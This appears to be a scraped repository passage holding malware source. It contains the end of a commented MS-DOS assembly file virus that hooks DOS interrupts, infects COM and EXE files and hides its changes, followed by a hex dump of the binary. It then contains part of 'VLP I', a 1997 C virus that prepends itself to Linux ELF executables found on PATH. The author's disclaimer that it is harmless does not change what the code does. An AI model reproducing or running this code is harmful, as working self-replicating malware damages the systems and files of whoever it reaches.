PUSH CX ;034E 51
PUSH DX ;034F 52
PUSH SI ;0350 56
PUSH DI ;0351 57
PUSH DS ;0352 1E
PUSH ES ;0353 06
CLD ;0354 FC
MOV DI,DX ;0355 8BFA
XOR DL,DL ;0357 32D2
CMP Byte ptr [DI+01],3A ;0359 807D013A
JNE L0364 ;035D 7505
MOV DL,[DI] ;035F 8A15
AND DL,1F ;0361 80E21F
;
L0364: MOV AH,36 ;
INT 21H ;GET DISK FREE SPACE
CMP AX,-1 ;0368 3DFFFF
JNE L0370 ;036B 7503
L036D: JMP I_90 ;036D E97702
;
L0370: MUL BX ;0370 F7E3
MUL CX ;0372 F7E1
OR DX,DX ;0374 0BD2
JNE L037D ;0376 7505
CMP AX,710H ;0378 3D1007
JC L036D ;037B 72F0
L037D: MOV DX,word ptr CS:[HOST_NAME]
PUSH DS ;0382 1E
POP ES ;0383 07
XOR AL,AL ;0384 32C0
MOV CX,41 ;0386 B94100
REPNE SCASB ;038A AE
MOV SI,word ptr CS:[HOST_NAME]
L0390: MOV AL,[SI] ;0390 8A04
OR AL,AL ;0392 0AC0
JE L03A4 ;0394 740E
CMP AL,61 ;0396 3C61
JC L03A1 ;0398 7207
CMP AL,7A ;039A 3C7A
JA L03A1 ;039C 7703
SUB Byte ptr [SI],20 ;039E 802C20
L03A1: INC SI ;03A1 46
JMP L0390 ;03A2 EBEC
;
L03A4: MOV CX,000B ;03A4 B90B00
SUB SI,CX ;03A7 2BF1
MOV DI,offset COMMAND_COM ;03A9 BF8400
PUSH CS ;03AC 0E
POP ES ;03AD 07
MOV CX,000B ;03AE B90B00
REPE CMPSB ;03B2 A6
JNE L03B8 ;03B3 7503
JMP I_90 ;03B5 E92F02
;
L03B8: MOV AX,4300H ;
INT 21H ;CHANGE FILE MODE
JC L03C4 ;03BD 7205
;
MOV CS:[HOST_ATT],CX ;03BF ;
L03C4: JC L03EB ;03C4 7225
XOR AL,AL ;03C6 32C0
MOV CS:[A004E],AL ;03C8 2EA24E00
PUSH DS ;03CC 1E
POP ES ;03CD 07
MOV DI,DX ;03CE 8BFA
MOV CX,41 ;03D0 B94100
REPNZ SCASB ;03D4 AE
CMP Byte ptr [DI-02],4D ;03D5 807DFE4D
JE L03E6 ;03D9 740B
CMP Byte ptr [DI-02],6D ;03DB 807DFE6D
JE L03E6 ;03DF 7405
INC Byte ptr CS:[A004E] ;03E1 2EFE064E00
;
L03E6: MOV AX,3D00H ;
INT 21H ;OPEN FILE READ ONLY
L03EB: JC L0447 ;
MOV CS:[HANDLE],AX ;03ED ;
;
MOV BX,AX ;MOVE TO END OF FILE -5
MOV AX,4202 ;
MOV CX,-1 ;FFFFFFFB
MOV DX,-5 ;
INT 21H ;MOVE FILE POINTER
JC L03EB ;
;
ADD AX,5 ;0400 ;
MOV CS:[A0011],AX ;?SAVE HOST SIZE
;
MOV CX,5 ;0407 ;READ LAST 5 BYTES OF HOST
MOV DX,offset A006B ;
MOV AX,CS ;
MOV DS,AX ;
MOV ES,AX ;
MOV AH,3FH ;
INT 21H ;READ FROM A FILE
;
MOV DI,DX ;0417 ;CHECK IF LAST 5 BYTES = 'MsDos'
MOV SI,offset MS_DOS ;
REPE CMPSB ;
JNE L0427 ;
MOV AH,3E ;IF == 'MsDos'...
INT 21H ;CLOSE FILE
JMP I_90 ;...PASS CONTROL TO DOS
;
L0427: MOV AX,3524 ;GET CRITICAL ERROR VECTOR
INT 21H ;GET VECTOR
MOV [OLD_24],BX ;
MOV [OLD_24+2],ES ;
;
MOV DX,offset NEW_24 ;
MOV AX,2524 ;SET CRITICAL ERROR VECTOR
INT 21H ;SET VECTOR
;
LDS DX,dword ptr [HOST_NAME];
XOR CX,CX ;
MOV AX,4301H ;
INT 21H ;CHANGE FILE MODE
L0447: JC L0484 ;
;
MOV BX,CS:[HANDLE] ;
MOV AH,3E ;
INT 21H ;CLOSE FILE
;
MOV Word ptr CS:[HANDLE],-1 ;CLEAR HANDLE
;
MOV AX,3D02 ;
INT 21H ;OPEN FILE R/W
JC L0484 ;
;
MOV CS:[HANDLE],AX ;0460 2EA37000
MOV AX,CS ;0464 8CC8
MOV DS,AX ;0466 8ED8
MOV ES,AX ;0468 8EC0
MOV BX,[HANDLE] ;046A 8B1E7000
MOV AX,5700 ;046E B80057
INT 21H ;GET/SET FILE DATE TIME
;
MOV [HOST_DATE],DX ;0473 89167400
MOV [HOST_TIME],CX ;0477 890E7600
MOV AX,4200 ;047B B80042
XOR CX,CX ;047E 33C9
MOV DX,CX ;0480 8BD1
INT 21H ;MOVE FILE POINTER
L0484: JC L04C3 ;0484 723D
;
CMP Byte ptr [A004E],00 ;0486 803E4E0000
JE L0490 ;048B 7403
JMP L04E6 ;048D EB57
;
NOP ;048F 90
L0490: MOV BX,1000 ;0490 BB0010
MOV AH,48 ;0493 B448
INT 21H ;ALLOCATE MEMORY
JNC L04A4 ;0497 730B
;
MOV AH,3E ;0499 B43E
MOV BX,[HANDLE] ;049B 8B1E7000
INT 21H ;CLOSE FILE (OBVIOUSLY)
JMP I_90 ;04A1 E94301
;
L04A4: INC Word ptr [A008F] ;04A4 FF068F00
MOV ES,AX ;04A8 8EC0
XOR SI,SI ;04AA 33F6
MOV DI,SI ;04AC 8BFE
MOV CX,710H ;04AE B91007
REP MOVSB ;04B2 A4
MOV DX,DI ;04B3 8BD7
MOV CX,[A0011] ;?GET HOST SIZE - YES
MOV BX,[70H] ;04B9 8B1E7000
PUSH ES ;04BD 06
POP DS ;04BE 1F
MOV AH,3FH ;04BF B43F
INT 21H ;READ FROM A FILE
L04C3: JC L04E1 ;04C3 721C
;
ADD DI,CX ;04C5 03F9
;
XOR CX,CX ;POINT TO BEGINNING OF FILE
MOV DX,CX ;
MOV AX,4200H ;
INT 21H ;MOVE FILE POINTER
;
MOV SI,offset MS_DOS ;04D0 BE0500
MOV CX,5 ;04D3 B90500
REP CS:MOVSB ;04D7 2EA4
MOV CX,DI ;04D9 8BCF
XOR DX,DX ;04DB 33D2
MOV AH,40H ;
INT 21H ;WRITE TO A FILE
L04E1: JC L04F0 ;
JMP L05A2 ;
;
;---------------------------------------;
; READ EXE HEADER ;
;---------------------------------------;
L04E6: MOV CX,1CH ;READ EXE HEADER INTO BUFFER
MOV DX,offset EXE_HDR ;
MOV AH,3F ;
INT 21H ;READ FILE
JC L053C ;
;
;---------------------------------------;
; TWEEK EXE HEADER TO INFECTED HSOT ;
;---------------------------------------;
MOV Word ptr [EXE_HDR+18],1984H ;SAVE HOST'S EXE HEADER INFO
MOV AX,[EXE_HDR+14] ; SS
MOV [HOST_SS],AX ;
MOV AX,[EXE_HDR+16] ; SP
MOV [HOST_SP],AX ;
MOV AX,[EXE_HDR+20] ; IP
MOV [HOST_IP],AX ;
MOV AX,[EXE_HDR+22] ; CS
MOV [HOST_CS],AX ;
MOV AX,[EXE_HDR+4] ; SIZE (IN 512 BLOCKS)
CMP Word ptr [EXE_HDR+2],0 ; SIZE MOD 512
JZ L051B ;IF FILE SIZE==0...JMP
DEC AX ;
L051B: MUL Word ptr [BLOCK_SIZE] ;
ADD AX,[EXE_HDR+2] ;
ADC DX,0 ;AX NOW = FILE SIZE
;
ADD AX,0FH ;MAKE SURE FILE SIZE IS PARA. BOUND
ADC DX,0 ;
AND AX,0FFF0H ;
MOV [HOST_SIZE],AX ;SAVE POINTER TO BEGINNING OF VIRUS
MOV [HOST_SIZE+2],DX ;
;
ADD AX,710H ;(SIZE OF VIRUS)
ADC DX,0 ;
L053C: JC L0578 ;IF > FFFFFFFF...JMP
DIV Word ptr [BLOCK_SIZE] ;
OR DX,DX ;
JE L0547 ;
INC AX ;
L0547: MOV [EXE_HDR+4],AX ;
MOV [EXE_HDR+2],DX ;
;---------------;
MOV AX,[HOST_SIZE] ;DX:AX = HOST SIZE
MOV DX,[HOST_SIZE+2] ;
DIV Word ptr [A007A] ;
SUB AX,[EXE_HEAD+8] ;SIZE OF EXE HDR
MOV [EXE_HDR+22],AX ;VALUE OF CS
MOV Word ptr [EXE_HDR+20],offset BEGIN_EXE ;VALUE OF IP
MOV [EXE_HDR+14],AX ;VALUE OF SS
MOV Word ptr [EXE_HDR+16],710H ;VALUE OF SP
;---------------;
XOR CX,CX ;POINT TO BEGINNING OF FILE (EXE HDR)
MOV DX,CX ;
MOV AX,4200H ;
INT 21H ;MOVE FILE POINTER
L0578: JC L0584 ;
;
;---------------------------------------;
; WRITE INFECTED EXE HEADER ;
;---------------------------------------;
MOV CX,1CH ;
MOV DX,offset EXE_HDR ;
MOV AH,40H ;
INT 21H ;WRITE TO A FILE
L0584: JC L0597 ;
CMP AX,CX ;
JNE L05A2 ;
;
MOV DX,[HOST_SIZE] ;POINT TO END OF FILE
MOV CX,[HOST_SIZE+2] ;
MOV AX,4200 ;
INT 21H ;MOVE FILE POINTER
L0597: JC L05A2 ;
;
;---------------------------------------;
; WRITE VIRUS CODE TO END OF HOST ;
;---------------------------------------;
XOR DX,DX ;
MOV CX,710H ;(SIZE OF VIRUS)
MOV AH,40H ;
INT 21H ;WRITE TO A FILE
;
L05A2: CMP Word ptr CS:[008F],0 ;IF...
JZ L05AE ;...SKIP
MOV AH,49H ;
INT 21H ;FREE ALLOCATED MEMORY
;
L05AE: CMP Word ptr CS:[HANDLE],-1 ;IF ...
JE I_90 ;...SKIP
;
MOV BX,CS:[HANDLE] ;RESTORE HOST'S DATE/TIME
MOV DX,CS:[HOST_DATE] ;
MOV CX,CS:[HOST_TIME] ;
MOV AX,5701H ;
INT 21H ;GET/SET FILE DATE/TIME
;
MOV AH,3EH ;
INT 21H ;CLOSE FILE
;
LDS DX,CS:[HOST_NAME] ;RESTORE HOST'S ATTRIBUTE
MOV CX,CS:[HOST_ATT] ;
MOV AX,4301H ;
INT 21H ;CHANGE FILE MODE
;
LDS DX,dword ptr CS:[OLD_24];RESTORE CRITICAL ERROR HANDLER
MOV AX,2524H ;
INT 21H ;SET VECTOR
;
I_90: POP ES ;
POP DS ;
POP DI ;
POP SI ;
POP DX ;
POP CX ;
POP BX ;
POP AX ;
POPF ; (OUR PUSHF)
JMP far CS:[OLD_21] ;PASS CONTROL TO DOS
;
;-----------------------------------------------------------------------;
; ;
;-----------------------------------------------------------------------;
;0100 E9 92 00 73 55 4D 73 44-6F 73 00 01 15 18 00 00 i..sUMsDos......
;0110 00 00 01 A5 FE 00 F0 60-14 4E 02 56 05 A5 16 48 ...%~.p`.N.V.%.H
;0120 7E 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ~...............
;0130 00 8E 17 80 00 00 00 80-00 8E 17 5C 00 8E 17 6C ...........\...l
;0140 00 8E 17 10 07 7A 34 C5-00 7A 34 10 F0 82 00 4D .....z4E.z4.p..M
;0150 5A D0 00 98 00 31 00 20-00 11 00 FF FF 5C 12 10 ZP...1. .....\..
;0160 07 84 19 C5 00 5C 12 20-00 00 00 C3 C3 C3 C3 C3 ...E.\. ...CCCCC
;0170 05 00 20 00 21 00 2D 00-00 02 10 00 C0 27 01 00 .. .!.-.....@'..
;0180 D9 41 28 9B 43 4F 4D 4D-41 4E 44 2E 43 4F 4D 01 YA(.COMMAND.COM.
;0190 00 00 00 00 00 FC B4 E0-CD 21 80 FC E0 73 16 80 .....|4`M!.|`s..
;01A0 FC 03 72 11 B4 DD BF 00-01 BE 10 07 03 F7 2E 8B |.r.4]?..>...w..
;01B0 8D 11 00 CD 21 8C C8 05-10 00 8E D0 BC 00 07 50 ...M!.H....P<..P
;01C0 B8 C5 00 50 CB FC 06 2E-8C 06 31 00 2E 8C 06 39 8E.PK|....1....9
;01D0 00 2E 8C 06 3D 00 2E 8C-06 41 00 8C C0 05 10 00 ....=....A..@...
;01E0 2E 01 06 49 00 2E 01 06-45 00 B4 E0 CD 21 80 FC ...I....E.4`M!.|
;01F0 E0 73 13 80 FC 03 07 2E-8E 16 45 00 2E 8B 26 43 `s..|.....E...&C
;0200 00 2E FF 2E 47 00 33 C0-8E C0 26 A1 FC 03 2E A3 ....G.3@.@&!|..#
;0210 4B 00 26 A0 FE 03 2E A2-4D 00 26 C7 06 FC 03 F3 K.& ~.."M.&G.|.s
;0220 A5 26 C6 06 FE 03 CB 58-05 10 00 8E C0 0E 1F B9 %&F.~.KX....@..9
;0230 10 07 D1 E9 33 F6 8B FE-06 B8 42 01 50 EA FC 03 ..Qi3v.~.8B.Pj|.
;0240 00 00 8C C8 8E D0 BC 00-07 33 C0 8E D8 2E A1 4B ...H.P<..3@.X.!K
;0250 00 A3 FC 03 2E A0 4D 00-A2 FE 03 8B DC B1 04 D3 .#|.. M."~..\1.S
;0260 EB 83 C3 10 2E 89 1E 33-00 B4 4A 2E 8E 06 31 00 k.C....3.4J...1.
;0270 CD 21 B8 21 35 CD 21 2E-89 1E 17 00 2E 8C 06 19 M!8!5M!.........
;0280 00 0E 1F BA 5B 02 B8 21-25 CD 21 8E 06 31 00 26 ...:[.8!%M!..1.&
;0290 8E 06 2C 00 33 FF B9 FF-7F 32 C0 F2 AE 26 38 05 ..,.3.9..2@r.&8.
;02A0 E0 F9 8B D7 83 C2 03 B8-00 4B 06 1F 0E 07 BB 35 `y.W.B.8.K....;5
;02B0 00 1E 06 50 53 51 52 B4-2A CD 21 2E C6 06 0E 00 ...PSQR4*M!.F...
;02C0 00 81 F9 C3 07 74 30 3C-05 75 0D 80 FA 0D 75 08 ..yC.t0<.u..z.u.
;02D0 2E FE 06 0E 00 EB 20 90-B8 08 35 CD 21 2E 89 1E .~...k .8.5M!...
;02E0 13 00 2E 8C 06 15 00 0E-1F C7 06 1F 00 90 7E B8 .........G....~8
;02F0 08 25 BA 1E 02 CD 21 5A-59 5B 58 07 1F 9C 2E FF .%:..M!ZY[X.....
;0300 1E 17 00 1E 07 B4 49 CD-21 B4 4D CD 21 B4 31 BA .....4IM!4MM!41:
;0310 00 06 B1 04 D3 EA 83 C2-10 CD 21 32 C0 CF 2E 83 ..1.Sj.B.M!2@O..
;0320 3E 1F 00 02 75 17 50 53-51 52 55 B8 02 06 B7 87 >...u.PSQRU8..7.
;0330 B9 05 05 BA 10 10 CD 10-5D 5A 59 5B 58 2E FF 0E 9..:..M.]ZY[X...
;0340 1F 00 75 12 2E C7 06 1F-00 01 00 50 51 56 B9 01 ..u..G.....PQV9.
;0350 40 F3 AC 5E 59 58 2E FF-2E 13 00 9C 80 FC E0 75 @s,^YX.......|`u
;0360 05 B8 00 03 9D CF 80 FC-DD 74 13 80 FC DE 74 28 .8...O.|]t..|^t(
;0370 3D 00 4B 75 03 E9 B4 00-9D 2E FF 2E 17 00 58 58 =.Ku.i4.......XX
;0380 B8 00 01 2E A3 0A 00 58-2E A3 0C 00 F3 A4 9D 2E 8...#..X.#..s$..
;0390 A1 0F 00 2E FF 2E 0A 00-83 C4 06 9D 8C C8 8E D0 !........D...H.P
;03A0 BC 10 07 06 06 33 FF 0E-07 B9 10 00 8B F3 BF 21 <....3...9...s?!
;03B0 00 F3 A4 8C D8 8E C0 2E-F7 26 7A 00 2E 03 06 2B .s$.X.@.w&z....+
;03C0 00 83 D2 00 2E F7 36 7A-00 8E D8 8B F2 8B FA 8C ..R..w6z..X.r.z.
;03D0 C5 2E 8B 1E 2F 00 0B DB-74 13 B9 00 80 F3 A5 05 E.../..[t.9..s%.
;03E0 00 10 81 C5 00 10 8E D8-8E C5 4B 75 ED 2E 8B 0E ...E...X.EKum...
;03F0 2D 00 F3 A4 58 50 05 10-00 2E 01 06 29 00 2E 01 -.s$XP......)...
;0400 06 25 00 2E A1 21 00 1F-07 2E 8E 16 29 00 2E 8B .%..!!......)...
;0410 26 27 00 2E FF 2E 23 00-33 C9 B8 01 43 CD 21 B4 &'....#.3I8.CM!4
;0420 41 CD 21 B8 00 4B 9D 2E-FF 2E 17 00 2E 80 3E 0E AM!8.K........>.
;0430 00 01 74 E4 2E C7 06 70-00 FF FF 2E C7 06 8F 00 ..td.G.p....G...
;0440 00 00 2E 89 16 80 00 2E-8C 1E 82 00 50 53 51 52 ............PSQR
;0450 56 57 1E 06 FC 8B FA 32-D2 80 7D 01 3A 75 05 8A VW..|.z2R.}.:u..
;0460 15 80 E2 1F B4 36 CD 21-3D FF FF 75 03 E9 77 02 ..b.46M!=..u.iw.
;0470 F7 E3 F7 E1 0B D2 75 05-3D 10 07 72 F0 2E 8B 16 wcwa.Ru.=..rp...
;0480 80 00 1E 07 32 C0 B9 41-00 F2 AE 2E 8B 36 80 00 ....2@9A.r...6..
;0490 8A 04 0A C0 74 0E 3C 61-72 07 3C 7A 77 03 80 2C ...@t.<ar.<zw..,
;04A0 20 46 EB EC B9 0B 00 2B-F1 BF 84 00 0E 07 B9 0B Fkl9..+q?....9.
;04B0 00 F3 A6 75 03 E9 2F 02-B8 00 43 CD 21 72 05 2E .s&u.i/.8.CM!r..
;04C0 89 0E 72 00 72 25 32 C0-2E A2 4E 00 1E 07 8B FA ..r.r%2@."N....z
;04D0 B9 41 00 F2 AE 80 7D FE-4D 74 0B 80 7D FE 6D 74 9A.r..}~Mt..}~mt
;04E0 05 2E FE 06 4E 00 B8 00-3D CD 21 72 5A 2E A3 70 ..~.N.8.=M!rZ.#p
;04F0 00 8B D8 B8 02 42 B9 FF-FF BA FB FF CD 21 72 EB ..X8.B9..:{.M!rk
;0500 05 05 00 2E A3 11 00 B9-05 00 BA 6B 00 8C C8 8E ....#..9..:k..H.
;0510 D8 8E C0 B4 3F CD 21 8B-FA BE 05 00 F3 A6 75 07 X.@4?M!.z>..s&u.
;0520 B4 3E CD 21 E9 C0 01 B8-24 35 CD 21 89 1E 1B 00 4>M!i@.8$5M!....
;0530 8C 06 1D 00 BA 1B 02 B8-24 25 CD 21 C5 16 80 00 ....:..8$%M!E...
;0540 33 C9 B8 01 43 CD 21 72-3B 2E 8B 1E 70 00 B4 3E 3I8.CM!r;...p.4>
;0550 CD 21 2E C7 06 70 00 FF-FF B8 02 3D CD 21 72 24 M!.G.p...8.=M!r$
;0560 2E A3 70 00 8C C8 8E D8-8E C0 8B 1E 70 00 B8 00 .#p..H.X.@..p.8.
;0570 57 CD 21 89 16 74 00 89-0E 76 00 B8 00 42 33 C9 WM!..t...v.8.B3I
;0580 8B D1 CD 21 72 3D 80 3E-4E 00 00 74 03 EB 57 90 .QM!r=.>N..t.kW.
;0590 BB 00 10 B4 48 CD 21 73-0B B4 3E 8B 1E 70 00 CD ;..4HM!s.4>..p.M
;05A0 21 E9 43 01 FF 06 8F 00-8E C0 33 F6 8B FE B9 10 !iC......@3v.~9.
;05B0 07 F3 A4 8B D7 8B 0E 11-00 8B 1E 70 00 06 1F B4 .s$.W......p...4
;05C0 3F CD 21 72 1C 03 F9 33-C9 8B D1 B8 00 42 CD 21 ?M!r..y3I.Q8.BM!
;05D0 BE 05 00 B9 05 00 F3 2E-A4 8B CF 33 D2 B4 40 CD >..9..s.$.O3R4@M
;05E0 21 72 0D E9 BC 00 B9 1C-00 BA 4F 00 B4 3F CD 21 !r.i<.9..:O.4?M!
;05F0 72 4A C7 06 61 00 84 19-A1 5D 00 A3 45 00 A1 5F rJG.a...!].#E.!_
;0600 00 A3 43 00 A1 63 00 A3-47 00 A1 65 00 A3 49 00 .#C.!c.#G.!e.#I.
;0610 A1 53 00 83 3E 51 00 00-74 01 48 F7 26 78 00 03 !S..>Q..t.Hw&x..
;0620 06 51 00 83 D2 00 05 0F-00 83 D2 00 25 F0 FF A3 .Q..R.....R.%p.#
;0630 7C 00 89 16 7E 00 05 10-07 83 D2 00 72 3A F7 36 |...~.....R.r:w6
;0640 78 00 0B D2 74 01 40 A3-53 00 89 16 51 00 A1 7C x..Rt.@#S...Q.!|
;0650 00 8B 16 7E 00 F7 36 7A-00 2B 06 57 00 A3 65 00 ...~.w6z.+.W.#e.
;0660 C7 06 63 00 C5 00 A3 5D-00 C7 06 5F 00 10 07 33 G.c.E.#].G._...3
;0670 C9 8B D1 B8 00 42 CD 21-72 0A B9 1C 00 BA 4F 00 I.Q8.BM!r.9..:O.
;0680 B4 40 CD 21 72 11 3B C1-75 18 8B 16 7C 00 8B 0E 4@M!r.;Au...|...
;0690 7E 00 B8 00 42 CD 21 72-09 33 D2 B9 10 07 B4 40 ~.8.BM!r.3R9..4@
;06A0 CD 21 2E 83 3E 8F 00 00-74 04 B4 49 CD 21 2E 83 M!..>...t.4IM!..
;06B0 3E 70 00 FF 74 31 2E 8B-1E 70 00 2E 8B 16 74 00 >p..t1...p....t.
;06C0 2E 8B 0E 76 00 B8 01 57-CD 21 B4 3E CD 21 2E C5 ...v.8.WM!4>M!.E
;06D0 16 80 00 2E 8B 0E 72 00-B8 01 43 CD 21 2E C5 16 ......r.8.CM!.E.
;06E0 1B 00 B8 24 25 CD 21 07-1F 5F 5E 5A 59 5B 58 9D ..8$%M!.._^ZY[X.
;06F0 2E FF 2E 17 00 00 00 00-00 00 00 00 00 00 00 00 ................
;0700 4D 00 00 0F 00 00 00 00-00 00 00 00 00 00 00 00 M...............
;0710 CD 20 0B 1B 00 9A F0 FE-1D F0 2F 01 0E 0A 3C 01 M ....p~.p/...<.
;0720 0E 0A EB 04 0E 0A 0E 0A-01 01 01 00 02 FF FF FF ..k.............
;0730 FF FF FF FF FF FF FF FF-FF FF FF FF DD 0A 0C 16 ............]...
;0740 52 0B 14 00 18 00 52 0B-FF FF FF FF 00 00 00 00 R.....R.........
;0750 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
;0760 CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20 M!K..........
;0770 20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20 .....
;0780 20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00 ........
;0790 00 0D 62 3A 0D 62 6F 2E-2A 20 62 3A 0D 00 00 00 ..b:.bo.* b:....
;07A0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 01 00 ................
;07B0 17 D0 01 00 01 00 17 D0-01 00 01 00 17 D0 02 00 .P.....P.....P..
;07C0 01 00 17 D0 02 00 01 00-87 CF 00 00 05 00 FF FF ...P.....O......
;07D0 EA CF 01 00 17 D0 07 00-01 00 6C 15 08 25 A5 FE jO...P....l..%%~
;07E0 BC 07 1E 02 10 07 6C 15-8E 17 2F 01 04 7F 70 00 <.....l.../...p.
;07F0 10 07 40 00 82 08 88 17-A5 16 1B 02 8E 17 02 02 ..@.....%.......
;0800 4D 15 18 05 00 00 00 00-00 00 00 00 00 00 00 00 M...............
;<<<<<<<<<< ORIGINAL CODE BEGINS HERE
;0810 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
;0820 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
;0830 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
;0840 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
;0850 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
;0860 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
;0870 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
;0880 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
;0890 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
;08A0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
;08B0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
;08C0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
;08D0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
;08E0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
;08F0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
;0900 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
;>>>>>>>>>> ORIGINAL CODE ENDS HERE
;0910 4D 73 44 6F 73
;-----------------------------------------------------------------------;
END


1204
MSDOS/Virus.MSDOS.Unknown.virusa.asm Normal file
View File

File diff suppressed because it is too large Load Diff

710
MSDOS/Virus.MSDOS.Unknown.vlp1.c Normal file
View File

@ -0,0 +1,710 @@
/* --- Cut - Begin MAIN.C --- */
/* This is VLP I . Another method to infect ELF-execs.
* Copyright (C) 1997 by Stealthf0rk of S V A T
* This Virii contains *no* malicious code, but due to
* bugs it is possible that you may get some damage on your system.
* You use this progrma(s) on your own risk ! ! !
* I'm not responsible for any damage you may get due to playing around
* with this. Only run VLP with permission of the owner of the system you
* wish to test VLP on.
*
* virii: $ cc -O2 -DDEBUG main.c get.c file_ops.c -o virii
* $ strip virii
* nacs: $ cc -O2 nacs.c get.c file_ops.c
*
* greets to NetW0rker and naleZ
*
* how it works
* in bash pseudo_code:
*
* find hostfile
* cp hostfile tmp
* grep THE_VIRCODE argv[0] > hostfile
* cat tmp >> hostfile
* grep THE_OLD_APPENDED_CODE_ON_ARGV[0] argv[0] > tmp
* tmp
*
*
* if you wanna contact the SVAT-group, write to
* stealthf0rk, stealth@cyberspace.org
*/
#include "vx.h"
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
/* The filedescriptor for the LOG-file */
#ifdef DEBUG
FILE *fd;
#endif
int main(int argc, char **argv, char **envp)
{
char *s, *s2, *path, *dir;
int i;
char from[200];
#ifdef DEBUG
/* If U are angry do this:
* setenv("PATH", "/root/VTEST/bin:/root/VTEST/bad:/root/VTEST/usr/bin:/root/VTEST/bad2", 1);
*/
fd = fopen(TRACEFILE, "a");
#endif
DFPRINTF("====== tracefile of stealthf0rk's VLP ==========\n");
path = getenv("PATH");
s = whereis(path, argv[0]); /* return only static! -> */
if (strcpy(from, s) == NULL) /* so we need a copy */
return -1;
DFPRINTF("@f main: file of action is <%s>\n", from);
i = infect(3, from);
exechost(from, argv, envp);
return 0;
}
/* --- Cut - End MAIN.C --- */
/* --- Cut - Begin FILE_OPS.C --- */
/* Thiz file contains the routines for writing the code etc. */
#include <stdio.h> /* .h files maybe different in different OS */
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <string.h>
#include <linux/dirent.h>
#include "vx.h"
#define TEMP "/tmp/temp" /* with this generate the name of the EXE */
#define TMP "/tmp/tmp" /* */
/*------------------------------*/
#ifdef DEBUG
extern FILE *fd; /* debugging */
#endif
struct utimbuf {
time_t actime;
time_t modtime;
};
/* ATA, ATH, ATD ... not found in my .h's */
extern int utime(char *, struct utimbuf*);
/* infect <anz> files , Auftraggeber is <caller> */
int infect(int anz, char *caller)
{
int i = 0, j = 0;
char *dir, *f, *path;
char file[200];
struct stat status; /* save time ... */
path = getenv("PATH");
if ((dir = getdir(path)) == NULL) /* find directory */
return -1;
while (i < anz && j < 10) { /* <anz> times */
DFPRINTF("------------- new infection stack ----------\n");
DFPRINTF("@f infect: directory of infection is <%s>\n", dir);
j++;
if ((f = gethost(dir, FILEPATH)) == NULL)
continue;
strcpy(file, f);
if (saveattribs(file, &status) < 0)
continue;
if (infect_host(file, caller) < 0)
continue;
if (restoreattribs(file, status) < 0)
continue;
i++;
j = 0;
DFPRINTF("@f infect: infected file is <%s>\n", file);
}
return i;
}
/* infect <host> directly */
int infect_host(char *host, char *caller)
{
int in,out,
r,w;
const int vlength = VLENGTH;
char *buff;
if ((buff = (char*)malloc(vlength)) == NULL)
return -1;
/* copy <host> to tempfile, open and truncate [the host]
* and copy the beginning (virus, vlength byte) of the running
* program [file 'caller'] to it.
*/
if (cp(host, TMP) == -1)
return -1;
DFPRINTF("@f infect_host: copied <%s> to <%s> \n", host, TMP);
if ((in = open(caller, O_RDONLY)) == -1)
return -1;
if ((out = open(host, O_RDWR|O_TRUNC)) == -1)
return -1;
DFPRINTF("@f infect_host: opened host <%s> and caller <%s>\n", host, caller);
if ((r = read(in, buff, vlength)) == -1)
return -1;
if ((w = write(out, buff, vlength)) == -1)
return -1;
close(in);
if ((in = open(TMP, O_RDWR)) == -1)
return -1;
/* append the rest of the original file to the host -> end of infection */
while ((r = read(in, buff, vlength)) > 0) {
if ((w = write(out, buff, r)) == -1)
return -1;
}
close(in);
close(out);
free(buff);
DFPRINTF("@f infect_host: try to remove <%s>\n", TMP);
remove(TMP);
return 0;
}
/* -------------------- isinfected ---------------------
* look if a 'detectstring' appears at the end of 'ffile'
* return 1 if so, 0 if not
*/
int isinfected (char *ffile)
{
int out,r = 0;
char cmp[4] = {0};
DFPRINTF("@f isinfected: look at <%s>\n", ffile);
if ((out = open(ffile, O_RDONLY)) == -1)
return -1;
if ((r = lseek(out, VLENGTH + 1, SEEK_SET)) == -1)
return -1;
if ((r = read (out, cmp, 3)) == -1)
return -1;
if (strcmp("ELF", cmp) == 0) {
close(out);
return 1;
} else
{
close(out);
return 0;
}
}
/* ------------ iself ------------
* look if 'host' is ELF
* return 1 if so, 0 if not
